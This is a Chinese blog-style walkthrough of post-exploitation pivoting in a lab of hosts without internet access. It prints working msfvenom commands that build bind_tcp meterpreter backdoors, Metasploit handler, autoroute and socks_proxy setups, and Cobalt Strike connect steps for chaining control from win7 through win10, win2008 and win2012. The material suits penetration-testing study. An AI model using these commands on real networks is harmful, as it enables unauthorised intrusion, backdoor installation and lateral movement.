内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线简单总结

我这里只记录原理,具体操作看文章后半段或者这篇文章内网渗透---代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线_内网渗透 代理-CSDN博客

注意这里是解决后渗透通讯问题,之后怎么提权,控制后面再说

背景

只有win7有网,其他没网

网络情况:win7有其他都没有

巧合地是:几台设备入栈规则不严格

代理协议:

SOCKS4/5

代理软件:

SocksCap Proxifier ProxyChains

实现两个目的:

1、通讯后的渗透测试横向移动

2、通讯后的控制上线CS&MSF

win7当作跳板机,端口转发攻击机的流量

win7上线

win7上线省略

VPS建立节点通信win10

MSF需要添加路由转发,CS不需要

添加路由只是MSF可以与WIN10通信,别的渗透工具不可以。所以还需要建立节点,使得渗透工具可以通信 建立节点的目的是接收数据,而前面的路由的目的是建立通讯

节点是在攻击者vps上建立的(准确点是在MSF中建立的节点,而MSF是控制win7的=相当于节点部署在win7上(这里可能理解不正确,暂时认为节点部署在了vps上)),开启vps端口接收数据,然后通过vps上的MSF控制器的路由去渗透内网主机

攻击者通过链接自己的vps进行操作

关键是建立节点

节点建立好之后,攻击者可以使用代理工具访问该节点,通过该节点访问内网主机

win10上线

到这里可以访问win10,然后如果我们拿到了win10的CMD权限,要控制他需要使用CS&MSF。但是win10不出网,而我们此时控制了win7,所以让win7去访问win10

我们需要正向链接,生成本地后门,执行后的权限把数据交给本地2222端口。win7控制器链接当前win10的2222。win7和CS通信,至此可以访问win10

bind_tcp 没有host,因为直接给的本地

(反向后门

后门执行完交给控制器的2222,控制器再监听自己本地的2222)

CS上线win10

使用win10的CMD权限(之前假设取得了此权限,怎么取得的呢?你信息搜集提权等操作取得的)执行后门,并不会上线

需要在win7的会话中访问win10 connect 192.168.11.129 2222即可上线

用192.168.11.128(win7)去控制192.168.11.129(win10)

MSF上线win10

正向链接

复制代码
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2003.exe

监听

复制代码
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129   ##目标地址
set lport 3333
run

session会话

VPS建立节点通信win2008

win10建立节点链接win2008

CS建立节点

攻击者本地使用代理工具链接该地址192.168.22.131

MSF建立节点

选择会话2

建立路由

run autoroute -p

run post/multi/manage/autoroute

节点要和上面的节点的端口号不要相同

use auxiliary/server/socks_proxy

set srvhost 0.0.0.0

set srvport 2233

run

攻击者本地使用代理工具链接该地址192.168.22.131

win2008上线

CS上线

创建新的监听器 设置一个正向连接,如果使用反向连接,木马上线后,由于无法和攻击机连接,所以就会导致上线失败,而这里使用正向连接,

生成3331的后门

将生成的木马放在win2008,运行木马。此时还是不会上线,和win10上线一样。

通过win10访问192.168.22.131 3331

MSF上线

生成正向链接木马

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2008.exe

监听

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost 192.168.22.131 ##目标地址

set lport 3333

run

win2012上线

CS上线

cs建立节点

然后探测资产信息,提权,正向链接

上线

建立监听,正向链接

生成后门,将后门放入win2012,执行后门

需要在win2008的会话中访问win2012 connect 192.168.33.130 4444即可上线

MSF上线

以下操作同上,所以直接复制上面的图片下来了

MSF建立节点

选择会话3

建立路由

run autoroute -p

run post/multi/manage/autoroute

节点要和上面的节点的端口号不要相同

use auxiliary/server/socks_proxy

set srvhost 0.0.0.0

set srvport 3344

run

攻击者本地使用代理工具链接该地址192.168.33.130

上线

生成正向链接木马

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > 2012.exe

监听

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost 192.168.33.129 ##目标地址

set lport 4444

run

入栈严格怎么办?

反向链接:

总结

相关推荐
FreeBuf_3 小时前
GNU Screen 曝多漏洞:本地提权与终端劫持风险浮现
安全·web安全·gnu
安 当 加 密4 小时前
hashicorp vault机密管理系统的国产化替代:安当SMS凭据管理系统,量子安全赋能企业密钥管理
安全
python算法(魔法师版)8 小时前
API安全
网络·物联网·网络协议·安全·网络安全
GIS数据转换器8 小时前
当三维地理信息遇上气象预警:电网安全如何实现“先知先觉”?
人工智能·科技·安全·gis·智慧城市·交互
网易易盾8 小时前
AIGC时代的内容安全:AI检测技术如何应对新型风险挑战?
人工智能·安全·aigc
w23617346018 小时前
识别安全网站,上网不再踩坑
安全
一刀到底2118 小时前
做为一个平台,给第三方提供接口的时候,除了要求让他们申请 appId 和 AppSecret 之外,还应当有哪些安全选项,要过等保3级
java·网络·安全
优质网络系统领域创作者12 小时前
思科(Cisco ASA/Firepower)、华三(H3C)、华为(Huawei USG)防火墙 的基础配置
安全
AORO_BEIDOU13 小时前
防爆手机与普通手机有什么区别
人工智能·5g·安全·智能手机·信息与通信
码农飞哥13 小时前
互联网大厂Java求职面试实战:Spring Boot与微服务场景深度解析
java·数据库·spring boot·安全·微服务·消息队列·互联网医疗